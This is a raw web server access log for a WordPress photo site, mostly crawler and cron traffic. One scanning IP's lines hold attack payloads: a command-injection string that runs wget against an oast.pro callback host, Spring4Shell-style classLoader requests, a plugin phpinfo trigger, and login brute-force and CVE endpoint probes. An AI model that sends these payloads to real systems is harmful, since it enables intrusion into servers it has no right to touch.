66.249.64.105 - - [18/Oct/2025:10:42:44 -0400] "GET /products112946390?kg=0111569078 HTTP/1.1" 200 29014 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.106 - - [18/Oct/2025:10:43:32 -0400] "GET /?ctg/search/similarImageSearchResultView/?ctgItemCd=188166 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.61.153.107 - - [18/Oct/2025:10:43:50 -0400] "POST /wp-cron.php?doing_wp_cron=1760798629.7689290046691894531250 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
157.20.32.210 - - [18/Oct/2025:10:43:42 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 400 21 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
20.171.207.254 - - [18/Oct/2025:10:43:39 -0400] "GET /products60916046?kg=0060173250 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
157.20.32.210 - - [18/Oct/2025:10:43:53 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 400 21 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:10:43:56 -0400] "POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:10:44:05 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15"
185.61.153.107 - - [18/Oct/2025:10:44:20 -0400] "POST /wp-cron.php?doing_wp_cron=1760798659.4710350036621093750000 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
66.249.64.106 - - [18/Oct/2025:10:44:22 -0400] "GET /?products7604352?kg=0007511697 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
157.20.32.210 - - [18/Oct/2025:10:44:29 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15"
66.249.64.105 - - [18/Oct/2025:10:44:40 -0400] "GET /?products4036618?kg=0003987472 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
157.20.32.210 - - [18/Oct/2025:10:44:31 -0400] "POST /functionRouter HTTP/1.1" 404 10853 "-" "Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Safari/605.1.15"
157.20.32.210 - - [18/Oct/2025:10:44:43 -0400] "POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1" 404 114 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36"
20.171.207.254 - - [18/Oct/2025:10:44:43 -0400] "GET /products60907386?kg=0060164696 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.64.107 - - [18/Oct/2025:10:45:04 -0400] "GET /?products2732400?kg=0002699161 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.105 - - [18/Oct/2025:10:45:22 -0400] "GET /?products13983250?kg=0013812804 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.105 - - [18/Oct/2025:10:45:32 -0400] "GET /?products5484442?kg=0005417640 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.105 - - [18/Oct/2025:10:46:09 -0400] "GET /?products6861354?kg=0006777760 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.254 - - [18/Oct/2025:10:46:48 -0400] "GET /products60921982?kg=0060179114 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.64.107 - - [18/Oct/2025:10:47:05 -0400] "GET /?products8647388?kg=0008542015 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
157.20.32.210 - - [18/Oct/2025:10:44:07 -0400] "POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:10:44:20 -0400] "POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:10:44:16 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15"
157.20.32.210 - - [18/Oct/2025:10:44:20 -0400] "POST /functionRouter HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Safari/605.1.15"
157.20.32.210 - - [18/Oct/2025:10:44:38 -0400] "GET /wp-content/plugins/stopbadbots/assets/js/stopbadbots.js HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:1.9.5.20) Gecko/ Firefox/3.6.5"
157.20.32.210 - - [18/Oct/2025:10:44:29 -0400] "POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1" 404 114 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)Safari/537.36"
66.249.64.105 - - [18/Oct/2025:10:45:33 -0400] "GET /?products12942712?kg=0012784957 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.61.153.107 - - [18/Oct/2025:10:45:48 -0400] "POST /wp-cron.php?doing_wp_cron=1760798748.7698171138763427734375 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
20.171.207.254 - - [18/Oct/2025:10:45:45 -0400] "GET /products60884340?kg=0060141931 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.64.105 - - [18/Oct/2025:10:45:52 -0400] "GET /?products13982726?kg=0013812286 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.105 - - [18/Oct/2025:10:46:28 -0400] "GET /?products4580438?kg=0004524662 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.61.153.107 - - [18/Oct/2025:10:46:30 -0400] "POST /wp-cron.php?doing_wp_cron=1760798790.5679759979248046875000 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
157.20.32.210 - - [18/Oct/2025:10:46:26 -0400] "GET /backend/backend/auth/signin HTTP/1.1" 404 12366 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
66.249.64.105 - - [18/Oct/2025:10:46:46 -0400] "GET /?products112226148?kg=0110857619 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
157.20.32.210 - - [18/Oct/2025:10:47:40 -0400] "POST / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:1.9.6.20) Gecko/ Firefox/3.6.19"
66.249.64.105 - - [18/Oct/2025:10:47:44 -0400] "GET /?products111171336?kg=0109815669 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
157.20.32.210 - - [18/Oct/2025:10:47:51 -0400] "GET /?location=search HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 6.1; rv:105.0) Gecko/20100101 Firefox/105.0"
66.249.64.105 - - [18/Oct/2025:10:47:05 -0400] "GET /?products12235666?kg=0012086532 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.105 - - [18/Oct/2025:10:47:24 -0400] "GET /?products5660546?kg=0005591596 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
157.20.32.210 - - [18/Oct/2025:10:47:40 -0400] "GET /?class.module.classLoader.resources.context.configFile=http://d3pm34ikdbcl3g7iqchgdyndzhexjo643.oast.pro&class.module.classLoader.resources.context.configFile.content.aaa=xxx HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Edge/117.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:10:47:40 -0400] "GET /?class.module.classLoader.resources.context.configFile=https://d3pm34ikdbcl3g7iqchgeh7i5m6jc7raq.oast.pro&class.module.classLoader.resources.context.configFile.content.aaa=xxx HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9"
157.20.32.210 - - [18/Oct/2025:10:47:40 -0400] "POST / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Mobile/15E148 Safari/604.1"
185.61.153.107 - - [18/Oct/2025:10:47:59 -0400] "POST /wp-cron.php?doing_wp_cron=1760798879.0685338973999023437500 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
20.171.207.254 - - [18/Oct/2025:10:47:49 -0400] "GET /products60895460?kg=0060152915 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
157.20.32.210 - - [18/Oct/2025:10:48:03 -0400] "POST /admin/login.php HTTP/1.1" 404 10853 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:10:48:06 -0400] "POST /cms/content/list HTTP/1.1" 404 12308 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0"
66.249.64.106 - - [18/Oct/2025:10:48:15 -0400] "GET /?products7500262?kg=0007408878 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.105 - - [18/Oct/2025:10:48:55 -0400] "GET /products121877256?kg=0120391029 HTTP/1.1" 200 28754 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
157.20.32.210 - - [18/Oct/2025:10:48:48 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 400 21 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.15"
20.171.207.254 - - [18/Oct/2025:10:48:53 -0400] "GET /products60889514?kg=0060147040 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.159 - - [18/Oct/2025:10:50:12 -0400] "GET /products148392448?kg=0146582865 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.225.200.144 - - [18/Oct/2025:10:50:39 -0400] "POST /xmlrpc.php HTTP/1.1" 200 205 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; MASEJS; rv:11.0) like Gecko"
185.61.153.107 - - [18/Oct/2025:10:51:16 -0400] "POST /wp-cron.php?doing_wp_cron=1760799075.9680309295654296875000 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
66.249.64.107 - - [18/Oct/2025:10:48:05 -0400] "GET /?products14638276?kg=0014459843 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
157.20.32.210 - - [18/Oct/2025:10:48:29 -0400] "POST /api.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36"
185.61.153.107 - - [18/Oct/2025:10:48:36 -0400] "POST /wp-cron.php?doing_wp_cron=1760798915.9690499305725097656250 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
157.20.32.210 - - [18/Oct/2025:10:48:29 -0400] "POST /ca/rest/certrequests HTTP/1.1" 404 12310 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:10:49:01 -0400] "GET /wp-admin/admin-ajax.php?action=easync_success_and_save HTTP/1.1" 400 21 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:10:49:54 -0400] "GET /robots.txt HTTP/1.1" 200 84 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.61.153.107 - - [18/Oct/2025:10:49:57 -0400] "POST /wp-cron.php?doing_wp_cron=1760798997.0767550468444824218750 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
216.73.216.159 - - [18/Oct/2025:10:49:54 -0400] "GET /products126495286?kg=0124952742 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.254 - - [18/Oct/2025:10:49:58 -0400] "GET /products60931334?kg=0060188350 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.159 - - [18/Oct/2025:10:50:00 -0400] "GET /products126461138?kg=0124919012 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.61.153.107 - - [18/Oct/2025:10:50:18 -0400] "POST /wp-cron.php?doing_wp_cron=1760799018.6679069995880126953125 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
185.244.36.159 - - [18/Oct/2025:10:50:46 -0400] "GET /wp-login.php HTTP/1.1" 200 2155 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; MANMJS; rv:11.0) like Gecko"
185.244.36.159 - - [18/Oct/2025:10:50:49 -0400] "POST /wp-login.php HTTP/1.1" 200 2171 "https://salhab360photos.com/wp-login.php" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; MANMJS; rv:11.0) like Gecko"
20.171.207.254 - - [18/Oct/2025:10:51:00 -0400] "GET /products60898698?kg=0060156112 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.159 - - [18/Oct/2025:10:51:12 -0400] "GET /products182046514?kg=0179826516 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:10:51:17 -0400] "GET /products182012116?kg=0179792539 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.61.153.107 - - [18/Oct/2025:10:51:35 -0400] "POST /wp-cron.php?doing_wp_cron=1760799095.6721510887145996093750 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
157.20.32.210 - - [18/Oct/2025:10:51:32 -0400] "GET /wp-json/rps_result/v1/route/student_fields HTTP/1.1" 404 114 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0"
66.249.64.105 - - [18/Oct/2025:10:52:04 -0400] "GET /products5553290?kg=0005485648 HTTP/1.1" 200 29053 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.61.153.107 - - [18/Oct/2025:10:52:15 -0400] "POST /wp-cron.php?doing_wp_cron=1760799135.1688320636749267578125 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
20.171.207.254 - - [18/Oct/2025:10:52:04 -0400] "GET /products60930460?kg=0060187487 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
98.70.29.56 - - [18/Oct/2025:10:52:05 -0400] "POST /wp-login.php HTTP/1.1" 200 6564 "-" "Mozilla/5.0"
157.20.32.210 - - [18/Oct/2025:10:52:21 -0400] "POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1" 404 10852 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) ConnectPC Safari/537.36"
157.20.32.210 - - [18/Oct/2025:10:52:25 -0400] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Safari/605.1.15"
157.20.32.210 - - [18/Oct/2025:10:52:31 -0400] "GET /OA_CGI/FNDWRR.exe HTTP/1.1" 404 10905 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; ko-KR) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27"
66.249.64.105 - - [18/Oct/2025:10:52:44 -0400] "GET /products4846482?kg=0004787460 HTTP/1.1" 200 29238 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.159 - - [18/Oct/2025:10:52:55 -0400] "GET /products148452468?kg=0146642155 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:10:53:04 -0400] "GET /products83823348?kg=0082801195 HTTP/1.1" 404 9735 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.254 - - [18/Oct/2025:10:53:06 -0400] "GET /products60920912?kg=0060178057 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
185.61.153.107 - - [18/Oct/2025:10:53:16 -0400] "POST /wp-cron.php?doing_wp_cron=1760799196.2705800533294677734375 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
216.73.216.159 - - [18/Oct/2025:10:53:40 -0400] "GET /products50681530?kg=0050063544 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:10:54:00 -0400] "GET /cgi-bin/mesh.cgi?page=upgrade&key=;%27wget+http://d3pm34ikdbcl3g7iqchg7fnzqjku8pp4f.oast.pro;%27 HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.10 Safari/605.1.15"
216.73.216.159 - - [18/Oct/2025:10:54:01 -0400] "GET /products235679926?kg=0232805862 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.61.153.107 - - [18/Oct/2025:10:54:15 -0400] "POST /wp-cron.php?doing_wp_cron=1760799255.1673951148986816406250 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
216.73.216.159 - - [18/Oct/2025:10:54:08 -0400] "GET /products34951762?kg=0034525604 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.64.107 - - [18/Oct/2025:10:54:20 -0400] "GET /products21543122?kg=0021280484 HTTP/1.1" 200 28908 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; GoogleOther)"
216.73.216.159 - - [18/Oct/2025:10:54:26 -0400] "GET /products76525270?kg=0075592118 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:10:51:27 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0 Safari/602.4.8"
216.73.216.159 - - [18/Oct/2025:10:51:23 -0400] "GET /products121003382?kg=0119527814 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:10:51:38 -0400] "GET /wp-content/plugins/vr-calendar-sync/assets/js/public.js HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:10:51:39 -0400] "GET /wp-json/rps_result/v1/route/search_student?department_id=1&batch_id=1 HTTP/1.1" 404 114 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.4"
157.20.32.210 - - [18/Oct/2025:10:51:41 -0400] "GET /wp-admin/admin-post.php?vrc_cmd=phpinfo HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:10:52:38 -0400] "GET /products3453184?kg=0003411153 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:10:52:39 -0400] "POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1" 404 10855 "-" "Mozilla/5.0 (X11; Linux i686; rv:1.9.5.20) Gecko/ Firefox/3.6.14"
216.73.216.159 - - [18/Oct/2025:10:52:46 -0400] "GET /products78166828?kg=0077213655 HTTP/1.1" 404 9733 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:10:53:10 -0400] "GET /products180303490?kg=0178104748 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:10:53:26 -0400] "POST /apisix/batch-requests HTTP/1.1" 404 10849 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0"
157.20.32.210 - - [18/Oct/2025:10:53:33 -0400] "GET /api/34EYb6Rffnm5FSICOsOkAbPU1fn HTTP/1.1" 404 10906 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6.1 Safari/605.1.15"
157.20.32.210 - - [18/Oct/2025:10:53:50 -0400] "POST /cgi-bin/nightled.cgi HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:10:53:49 -0400] "GET /products54865170?kg=0054196164 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:10:53:48 -0400] "GET /sap/public/bc/ur/Login/assets/corbu/sap_logo.png HTTP/1.1" 404 54121 "-" "-"
157.20.32.210 - - [18/Oct/2025:10:53:59 -0400] "GET / HTTP/1.1" 200 4189 "-" "-"
